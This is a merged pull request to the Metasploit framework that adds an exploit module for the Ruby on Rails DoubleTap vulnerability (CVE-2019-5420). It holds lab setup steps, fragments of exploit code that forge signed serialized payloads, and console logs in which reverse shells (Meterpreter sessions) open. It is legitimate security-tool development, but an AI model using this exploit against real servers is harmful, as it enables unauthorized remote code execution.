### PR TITLE
Add CVE-2019-5420 : Ruby on Rails DoubleTap Development Mode secret_key_base Vulnerability

### PR DESCRIPTION
**Pull request by wchen-r7**
# Background

This module exploits a vulnerability in Ruby on Rails. In development mode, a Rails application would use its name as the secret_key_base, and can be easily extracted by visiting an invalid resource for a path. As a result, this allows a remote user to create and deliver a signed serialized payload, load it by the application, and gain remote code execution.

# Vulnerable Setup

In order to set up a vulnerable box for testing, do this on a Linux machine (such as Ubuntu), and assuming you already have rvm installed:

```
$ rvm gemset create test
$ rvm gemset use test
$ gem install rails '5.2.1'
$ rails new demo
```

Next, cd to demo, and then modify the Gemfile like this:

```
$ echo "gem 'rails', '5.2.1'" >> Gemfile
$ echo "gem 'sqlite3', '~> 1.3.6', '< 1.4'" >> Gemfile
$ echo "source 'https://rubygems.org'" >> Gemfile
$ bundle
```

Next, add a new controller:

```
rails generate controller metasploit
```

And add the index method for that controller (under app/controllers/metasploit_controllers.rb):

```
class MetasploitController < ApplicationController
  def index
    render file: "#{Rails.root}/test.html"
  end
end
```

In the root directory, add a new test.html:

```
echo Hello World > test.html
```

Also, add that new route in config/routes.rb:

```
Rails.application.routes.draw do
  resources :metasploit
end
```

And finally, start the application (since no mode is specified, by default, it is development mode):

```
rails s -b 0.0.0.0
```

# Demo

```
msf5 exploit(multi/http/rails_double_tap) > check
[+] 172.16.249.141:3000 - The target is vulnerable.
msf5 exploit(multi/http/rails_double_tap) > exploit

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] Attempting to retrieve the application name...
[*] The application name is: Demo
[*] Stager ready: 433 bytes
[*] Sending serialized payload to target (1250 bytes)
[*] Sending stage (985320 bytes) to 172.16.249.141
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.141:62572) at 2019-04-25 16:29:43 -0500
[+] Deleted /tmp/LsvSGK.bin
[+] Deleted /tmp/tSJfp.bin

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > pwd
/home/sinn3r/demo
meterpreter >
```

### CODE REVIEW

File: modules/exploits/multi/http/rails_double_tap.rb [hunk 1]
```diff
@@ -0,0 +1,230 @@
...
+
+    stager = get_stager_code
+    print_status("Stager ready: #{stager.length} bytes")
+
+    rails_payload = generate_rails_payload(app_name, stager)
+    print_status("Sending serialized payload to target (#{rails_payload.length} bytes)")
+    send_serialized_payload(rails_payload)
+  end
+end
+
```
Comment (wvu-r7) [inline modules/exploits/multi/http/rails_double_tap.rb]: You can remove this blank line.

File: documentation/modules/exploit/multi/http/rails_double_tap.md [hunk 2]
```diff
@@ -0,0 +1,105 @@
+# Ruby on Rails DoubleTap Development Mode secret_key_base Vulnerability
+
+## Background
+
+Ruby on Rails is a server-side web application framework written in Ruby. It is a model-view-controller (MVC) archtecture, providing default structures for a database, a web service, and web pages. It is also a popular choice of ramework among well known services and products such as Github, Bloomberg, Soudcloud, Groupon, Twitch.tv, and of course, Rapid7s Metasploit.
```
Comment (bcoles) [inline documentation/modules/exploit/multi/http/rails_double_tap.md]:
```suggestion
Ruby on Rails is a server-side web application framework written in Ruby. It is a model-view-controller (MVC) architecture, providing default structures for a database, a web service, and web pages. It is also a popular choice of ramework among well known services and products such as GitHub, Bloomberg, Soudcloud, Groupon, Twitch.tv, and of course, Rapid7s Metasploit.
```

File: documentation/modules/exploit/multi/http/rails_double_tap.md [hunk 3]
```diff
@@ -0,0 +1,105 @@
...
+
+In development mode, Ruby on Rails versions including 5.2.2 and prior are vulnerable to a remote code execution vulnerabiity due to a predictable secret_key_base based on the name of the Rails application, and use it to create a signed serialized payload, and gain remote code execution.
```
Comment (bcoles) [inline documentation/modules/exploit/multi/http/rails_double_tap.md]:
```suggestion
In development mode, Ruby on Rails versions including 5.2.2 and prior are vulnerable to a remote code execution vulnerability due to a predictable secret_key_base based on the name of the Rails application, and use it to create a signed serialized payload, and gain remote code execution.
```

File: modules/exploits/multi/http/rails_double_tap.rb [hunk 4]
```diff
@@ -0,0 +1,229 @@
...
+        [
+          [ 'CVE', '2019-5420' ],
+          [ 'URL', 'https://hackerone.com/reports/473888' ],
+          [ 'URL', 'https://github.com/mpgn/Rails-doubletap-RCE' ],
+          [ 'URL', 'https://groups.google.com/forum/#!searchin/rubyonrails-security/CVE-2019-5420/rubyonrails-security/IsQKvDqZdKw/UYgRCJz2CgAJ' ]
+        ],
+      'Platform'       => 'linux',
+      'Targets'        =>
+        [
+          [ 'Ruby on Rails 5.2', { } ]
```
Comment (bcoles) [inline modules/exploits/multi/http/rails_double_tap.rb]: `<= 5.2` ?

File: modules/exploits/multi/http/rails_double_tap.rb [hunk 5]
```diff
@@ -0,0 +1,229 @@
...
+      OpenSSL::HMAC.hexdigest(OpenSSL::Digest.const_get(@digest).new, @secret, data)
+    end
+
+    def encode(message)
+      Rex::Text::encode_base64(message)
+    end
+  end
+
+  def check
+    check_code = Exploit::CheckCode::Safe
```
Comment (bcoles) [inline modules/exploits/multi/http/rails_double_tap.rb]:
```ruby
  def check
    check_code = CheckCode::Safe

    app_name = get_application_name

    check_code = CheckCode::Appears unless app_name.blank?

    test_payload = %Q|puts 1|
    rails_payload = generate_rails_payload(app_name, test_payload)
    result = send_serialized_payload(rails_payload)

    check_code = CheckCode::Vulnerable if result

    check_code
  rescue Msf::Exploit::Failed => e
    vprint_error(e.message)
    return check_code if e.message.to_s.include? NO_RAILS_ROOT_MSG
    CheckCode::Unknown
  end
```

File: modules/exploits/multi/http/rails_double_tap.rb [hunk 6]
```diff
@@ -0,0 +1,229 @@
...
+    root_info_value = rails_root_node.text.scan(/Rails.root: (.+)/).flatten.first
+    report_note(host: rhost, type: 'rails.root_info', data: root_info_value, update: :unique_data)
+    root_info_value
+  end
+
+  # Returns the application name based on Rails.root. It seems in development mode, the
+  # application name is used as a secret_key_base to encrypt/decrypt data.
+  def get_application_name
+    root_info = get_rails_root_info
+    app_name = root_info.split('/').last.capitalize
```
Comment (bcoles) [inline modules/exploits/multi/http/rails_double_tap.rb]:
```suggestion
    root_info.split('/').last.capitalize
```

**Comment by wchen-r7** [comment]
Thank you for the feedback. I think I have addressed all the ones mentioned above. Please let me know if there's any more.

File: documentation/modules/exploit/multi/http/rails_double_tap.md [hunk 7]
```diff
@@ -0,0 +1,105 @@
+# Ruby on Rails DoubleTap Development Mode secret_key_base Vulnerability
+
+## Background
+
+Ruby on Rails is a server-side web application framework written in Ruby. It is a model-view-controller (MVC) architecture, providing default structures for a database, a web service, and web pages. It is also a popular choice of framework among well known services and products such as Github, Bloomberg, Soudcloud, Groupon, Twitch.tv, and of course, Rapid7s Metasploit.
```
Comment (bcoles) [inline documentation/modules/exploit/multi/http/rails_double_tap.md]:
```suggestion
Ruby on Rails is a server-side web application framework written in Ruby. It is a model-view-controller (MVC) architecture, providing default structures for a database, a web service, and web pages. It is also a popular choice of framework among well known services and products such as Github, Bloomberg, Soundcloud, Groupon, Twitch.tv, and of course, Rapid7s Metasploit.
```

**Comment by space-r7** [comment]
Tested on `v5.2.1`:

```
msf5 > use exploit/multi/http/rails_double_tap 
msf5 exploit(multi/http/rails_double_tap) > set rhosts 192.168.37.186
rhosts => 192.168.37.186
msf5 exploit(multi/http/rails_double_tap) > check
[+] 192.168.37.186:3000 - The target is vulnerable.
msf5 exploit(multi/http/rails_double_tap) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Attempting to retrieve the application name...
[*] The application name is: Demo
[*] Stager ready: 433 bytes
[*] Sending serialized payload to target (1250 bytes)
[*] Sending stage (985320 bytes) to 192.168.37.186
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.186:43798) at 2019-05-01 08:29:51 -0500
[+] Deleted /tmp/LxcZAf.bin
[+] Deleted /tmp/xdVrO.bin

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : 192.168.37.186
OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```

**Comment by space-r7** [comment]
## Release Notes

This adds an exploit module that can predict the `secret_key_base` to a Ruby on Rails application while it is running in development mode and use the `secret_key_base` to generate a serialized payload. Sending that payload back to the Rails application can then result in remote code execution. This vulnerability exists for Rails versions 5.2.2 and below.

File: documentation/modules/exploit/multi/http/rails_double_tap.md (hunk 7 above)
Comment (space-r7) [reply documentation/modules/exploit/multi/http/rails_double_tap.md]: Resolved this while landing.

**Pull request merged**